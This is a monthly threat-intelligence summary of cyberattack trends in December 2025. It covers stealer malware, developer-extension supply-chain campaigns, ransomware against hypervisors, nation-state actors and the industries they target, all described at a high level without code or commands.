MONTHLY WRAP MONTHLY WRAP

Overview

December 2025 demonstrated a clear pivot toward trust-plane exploitation, with both criminal and state-aligned actors favoring legitimate platforms, built-in tooling, and familiar workflows over novel exploits. Campaigns increasingly abuse AI platforms, developer tools, cloud services, endpoint security software, and native operating system utilities to achieve stealthy initial access, credential theft, and durable persistence. Rather than relying on zero-days, adversaries emphasized misconfiguration, user-driven execution, and living-off-the-land techniques, while ransomware and access-broker ecosystems accelerated operations through automation and infrastructure-level targeting. Collectively, activity throughout the month underscored that trust, configuration hygiene, and behavioral visibility now define the effective security boundary more than exploit prevention alone.

  • Trust-plane exploitation through legitimate platforms and workflows: Atomic macOS Stealer delivery via AI-poisoned search results and ChatGPT-themed troubleshooting pages, AMOS stealer commands embedded in trusted AI conversations, Calendly-themed AiTM phishing targeting Google Workspace and Facebook Business, Microsoft Teams vishing paired with Quick Assist abuse, and Storm-0249 DLL sideloading inside SentinelOne’s SentinelAgentWorker[.]exe showed attackers systematically abusing trusted brands, security tooling, and support workflows as primary execution paths.
  • Developer-ecosystem and tooling compromise at scale: Glassworm’s multi-wave malicious VS Code and OpenVSX extensions, Piithon-linter proof-of-concept extensions bypassing marketplace review, poisoned extension updates pushed post-approval, credential harvesting from GitHub, npm, and OpenVSX tokens, and the use of Unicode obfuscation and Rust payloads turned IDEs and developer workstations into direct supply-chain intrusion vectors.
  • Credential theft and stealer-as-a-service industrialization: SantaStealer’s pre-release MaaS offering, Sryxen’s Chrome App-Bound Encryption bypass via headless DevTools, Phantom Stealer v3.5’s multi-stage [.NET] injection chain, MacSync Stealer’s notarized Swift dropper, AMOS macOS stealer campaigns, and Telegram-based exfiltration pipelines reinforced credential theft as the dominant access-enablement and monetization strategy.
  • Living-off-the-land and security-tool abuse as default post-compromise tradecraft: Velociraptor misuse following ToolShell and WSUS exploitation, Nezha monitoring agent abuse for persistent SYSTEM-level access, extensive use of PowerShell, WMI, certutil, scheduled tasks, and Quick Assist, and Storm-0249 execution inside signed EDR binaries highlighted how attackers increasingly operate entirely within legitimate administrative and security tooling.
  • Ransomware evolution toward infrastructure-level and access-broker-driven operations: Hypervisor-focused attacks against ESXi, vCenter, and Hyper-V environments led by Akira, HardBit 4.0’s authorization-gated ransomware with destructive wiper mode, VolkLocker’s rapidly scaled but technically flawed RaaS rollout, and access-broker staging by Storm-0249 reflected continued maturation around efficiency, blast radius, and pre-positioned access.
  • Nation-state espionage favoring durable, low-noise access paths: Russian APT44 exploitation of misconfigured network edge devices, PRC-aligned update and DNS abuse, Iranian MuddyWater and Prince of Persia modular tooling evolution, DPRK recruitment-themed malware delivery, and Tomiris’ Telegram- and Discord-based C2 underscored sustained investment in persistence, selective targeting, and public-service infrastructure abuse.
  • Mobile, banking, and account-takeover ecosystems expand in capability: Albiriox Android banking MaaS, FvncBot’s real-time VNC-style mobile fraud platform, ClayRat’s Accessibility-driven device takeover, Spiderman phishing kit expansion into banking and crypto fraud, and NFC-enabled relay techniques continue to erode traditional authentication and fraud-prevention controls.
  • Edge devices, management planes, and exposed services remain high-value entry points: Ivanti EPM client-side and file-write vulnerabilities, Fortinet FortiCloud SSO signature-bypass flaws, CentreStack exposure targeted by Clop, critical-infrastructure edge compromise, and recurring high-impact CVEs reinforced that internet-exposed management interfaces and security appliances remain priority targets for both state and criminal actors.

Threat Landscape Overview 

The operational pattern across December shows adversaries consolidating around low-friction, high-leverage trust and control planes, including developer tooling, endpoint security software, AI platforms, cloud services, and virtualization layers. Rather than prioritizing novel exploitation, attackers repeatedly achieved access by abusing legitimate workflows and misconfigurations, turning IDE extensions, AI-assisted troubleshooting, remote support utilities, and EDR processes into primary intrusion paths. Campaigns such as Glassworm’s VS Code and OpenVSX extension waves, AI-poisoned delivery of Atomic and AMOS macOS stealers, Storm-0249’s execution inside signed EDR binaries, and large-scale abuse of Quick Assist, Velociraptor, and Nezha illustrate how trusted tooling now provides scalable, low-noise access. In parallel, credential theft operations expanded across Windows, macOS, mobile, and browser ecosystems, with stealer-as-a-service platforms and phishing frameworks feeding access-broker and ransomware workflows while minimizing infrastructure exposure through Telegram- and Discord-based exfiltration.

Ransomware, access brokerage, and espionage activity continued to converge around persistence, speed, and control of infrastructure rather than overt disruption. Ransomware operators increasingly targeted hypervisors, management planes, and backup environments to maximize blast radius, while relying on brokers such as Storm-0249 to deliver pre-staged access that compresses time-to-impact. Nation-state actors mirrored this emphasis on durability, favoring edge-device compromise, update hijacking, public-service command-and-control, and living-off-the-land tradecraft to sustain long-term access with limited visibility. Simultaneously, AI-adjacent risk moved decisively from an emerging concern to operational reality, as attackers embedded malicious activity within trusted AI interactions, misconfigured agent ecosystems, and AI-assisted delivery paths, without exploiting the models themselves. December’s activity reinforces that effective defense now depends less on exploit prevention alone and more on governing trust relationships, identity, tooling, and automation, with behavioral monitoring and configuration discipline becoming central to countering adversaries operating in plain sight.

Industries Targeted

  • Cloud, SaaS & DevOps: Shai-Hulud’s self-propagating npm worm, IndonesianFoods registry flooding, malicious npm cloaking activity by dino_reborn, Tsundere’s Node.js botnet leveraging Ethereum-based command-and-control, PyPI and NuGet backdoored packages, prompt injection in GitLab Duo, SSRF in Kibana’s AI Assistant, command execution in CWP, and exploitation of legacy bootstrap scripts and abandoned domains in Python packaging positioned developer and cloud ecosystems as primary intrusion and sabotage vectors.
  • Finance, Fintech & Crypto: Sturnus Android banking trojan operations, Fantasy Hub MaaS targeting Russian financial institutions, BankBot-YNRK and DeliveryRAT financial stealers, NGate NFC relay–enabled ATM fraud, macOS spyware harvesting wallet and browser data (Nova Stealer), and DPRK recruitment-themed campaigns targeting AI and cryptocurrency firms underscored sustained pressure on financial platforms and digital asset infrastructure.
  • Government & Defense: APT24’s BadAudio supply-chain espionage, PlushDaemon update hijacking campaigns, Operation SkyCloak targeting Russian and Belarusian military units, SpearSpecter operations against senior officials, Ferocious Kitten surveillance of dissident communities, Nevada’s statewide ransomware incident, and the breach of the U.S. Congressional Budget Office highlighted continued targeting of government, defense, and public-sector institutions.
  • Manufacturing, Industrial & Critical Infrastructure: PlushDaemon’s SlowStepper backdoor deployed against manufacturers and ICS-adjacent environments, Sharp7Extend NuGet time-bomb packages targeting Siemens PLC workflows, Tsundere’s Node-based botnet across industrial endpoints, and Kraken and Cephalus ransomware operations against virtualized infrastructure supporting OT management emphasized persistent risk to industrial and critical infrastructure operators.
  • Telecommunications, Hosting & Internet Infrastructure: The Cloudflare global outage and follow-on analysis, active exploitation of CWP hosting panels, EdgeStepper router implants for update and traffic hijacking, Operation SkyCloak’s Tor-based SSH backdoors, and the Update Health Tools Azure storage hijack demonstrated how compromise or misconfiguration at the infrastructure and routing layer can cascade into widespread service disruption.

Most Active Threat Actors

  • APT44 / Storm-2603 (Russia-aligned): Long-running critical-infrastructure targeting via misconfigured network edge devices, packet capture and credential replay at the perimeter, ToolShell-enabled post-exploitation, Velociraptor abuse for SYSTEM-level persistence, and sustained access to energy, telecom, and cloud-adjacent environments without reliance on zero-day exploitation.
  • Storm-0249 (financially motivated): Precision initial-access operations abusing ClickFix social engineering, fileless PowerShell delivery, DLL sideloading into signed EDR processes (SentinelAgentWorker[.]exe), SYSTEM-level MSI persistence, and brokered access handoff to ransomware affiliates.
  • Glassworm (financially motivated): Multi-wave malicious VS Code and OpenVSX extension campaigns using Unicode obfuscation, post-approval update poisoning, Rust payloads, credential harvesting from GitHub, npm, and cloud tokens, and SOCKS/HVNC deployment on developer workstations.
  • Akira (financially motivated): Accelerated ransomware campaigns targeting ESXi, vCenter, and Hyper-V management planes, exploiting weak segmentation and identity misconfigurations to achieve mass encryption and infrastructure-level impact.
  • CyberVolk / VolkLocker (Russia-nexus): Reemergence with Golang-based ransomware-as-a-service featuring Telegram-driven automation, affiliate onboarding, cross-platform payloads, and operational weaknesses caused by hardcoded encryption material and minimal obfuscation.
  • BlackForce (financially motivated): Mature phishing-as-a-service operations leveraging React-based frontends, real-time Man-in-the-Browser MFA relay, mobile-only targeting, ISP and crawler filtering, and stateful backend credential handling to enable full account takeover.
  • REF7707 / NANOREMOTE operators (espionage-motivated): Deployment of modular Windows backdoors abusing Google Drive APIs for encrypted command-and-control, resumable file transfer, in-memory execution, and long-term post-exploitation tasking.
  • Spiderman Toolkit operators (financially motivated): Large-scale European banking and crypto fraud via fully automated phishing kits supporting real-time credential, OTP, and PhotoTAN capture, identity packet harvesting, and cross-border financial targeting.
  • Albiriox, FvncBot, and ClayRat operators (financially motivated): Accessibility-abuse-driven mobile malware enabling full device takeover, VNC-style remote control, screen streaming, NFC relay fraud, and scalable account takeover across banking and fintech applications.
  • MuddyWater (Iran-aligned): Targeted espionage using new loaders and backdoors with reflective loading, Windows CNG cryptography, modular tasking, and long-term access against government, academic, and critical-infrastructure entities.

Hunter Insights

Adversaries are likely to deepen their focus on trust-plane abuse in 2026, expanding campaigns that weaponize AI assistants, IDE extensions, endpoint security tools, remote support utilities, and cloud management planes as primary intrusion paths rather than relying on novel exploits. Expect more self-propagating supply-chain attacks like GlassWorm against developer ecosystems, industrialized stealer-as-a-service offerings that harvest multi-platform credentials at scale, and routine post-compromise use of DFIR and EDR tooling (for example, Velociraptor-style misuse) to blend command-and-control into legitimate administrative activity while compressing time from access to monetization or impact.​

Looking ahead, ransomware, access brokers, and nation-state operators will continue converging on infrastructure-level objectives—hypervisors, edge devices, update channels, and public-service platforms—where control of identity, configuration, and automation yields maximum blast radius with minimal visibility. Financial, cloud/DevOps, and mobile-banking ecosystems should anticipate more MaaS-style mobile RATs, NFC relay fraud, and CI/CD poisoning. At the same time, governments and critical infrastructure operators face persistent APT44- and MuddyWater-style campaigns that exploit misconfiguration and living-off-the-land tradecraft to maintain durable footholds for both espionage and contingency disruption.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.